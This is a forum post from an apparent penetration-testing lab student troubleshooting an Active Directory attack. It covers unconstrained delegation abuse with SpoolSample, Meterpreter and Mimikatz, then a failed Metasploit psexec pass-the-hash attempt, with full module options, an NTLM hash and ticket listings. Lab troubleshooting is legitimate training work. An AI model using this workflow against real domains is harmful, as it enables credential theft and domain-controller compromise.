Hello,
I have encountered troubles with LAB 3. During writing this post I have found the solution to part of exercise (still posted it in case somebody had similar problems) but I have problem with last step of compromising DC. I have probably did something foolish and can’t see mistake. I have started with access to DB-SRV as system and trying to exploit Unconstrained Delegation.
Here is part which is seems to work
First I have confirmed configuration with BloodHound:
I have used Raw query to see only computers
match (c:Computer) return c
Then I have compiled SpoolSample from:
I think that problems might came with compilation process so I will describe what I did with more details.
After opening solution I have made SpoolSample as startup project.
Then switched from debug to release in debugger’s configuration manager.
Then used Clean Solutuion option and rebuild all. Compilation succeded.
I have copied binary from:
C:\Users\__retracted__\PTX\SpoolSample-master\SpoolSample\bin\Release\SpoolSample.exe
to my vmware share. I have also confirmed that binary executes.
Then I have switched to meterpreter session with system privilege and uploaded it to path
C:\Users\Public\Documents\
Then I have executed the attack as described in solutions.
I have read input UNTIL THE END executing channel -r few times and it showed ticket with a bit different output.
Mimikatz part was exactly the same as in solution and I have retrieved hashes as in solution.
PART WHICH IS NOT WORKING:
So I have hash and using psexec as fallows:
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.1.3 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain els.corp no The Windows domain to use for authentication
SMBPass 8645e87e2593507cf623f3291b1334c2 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/wri
te folder share
SMBUser els-admin no The username to authenticate as
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.10.1.3 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
and got:
msf6 exploit(windows/smb/psexec) > exploit
[*] 10.10.1.3:445 - Connecting to the server...
[*] 10.10.1.3:445 - Authenticating to 10.10.1.3:445|els.corp as user 'els-admin'...
[-] 10.10.1.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.
And here is dead end in terms of solution part. Is it possible to use psexec or should I have go other direction?
UPDATE 1
Here are cached Tickets:
C:\>klist
klist
Current LogonId is 0:0x3e7
Cached Tickets: (3)
#0> Client: ELS-DC$ @ ELS.CORP
Server: krbtgt/ELS.CORP @ ELS.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/10/2021 23:41:48 (local)
End Time: 10/11/2021 9:41:47 (local)
Renew Time: 10/17/2021 23:41:47 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: ELS-DC$ @ ELS.CORP
Server: ldap/eLS-DC.els.corp @ ELS.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 10/11/2021 2:05:43 (local)
End Time: 10/11/2021 9:41:47 (local)
Renew Time: 10/17/2021 23:41:47 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: eLS-DC.els.corp
#2> Client: ELS-DC$ @ ELS.CORP
Server: ldap/eLS-DC.els.corp/els.corp @ ELS.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 10/11/2021 2:04:26 (local)
End Time: 10/11/2021 9:41:47 (local)
Renew Time: 10/17/2021 23:41:47 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: eLS-DC.els.corp
I have tried to ls dc c drive and got access denied:
C:\>dir \\ELS-DC\C$
dir \\ELS-DC\C$
Access is denied.
C:\>
PS.
I have made screenshots but they gone due to “New user” policy.
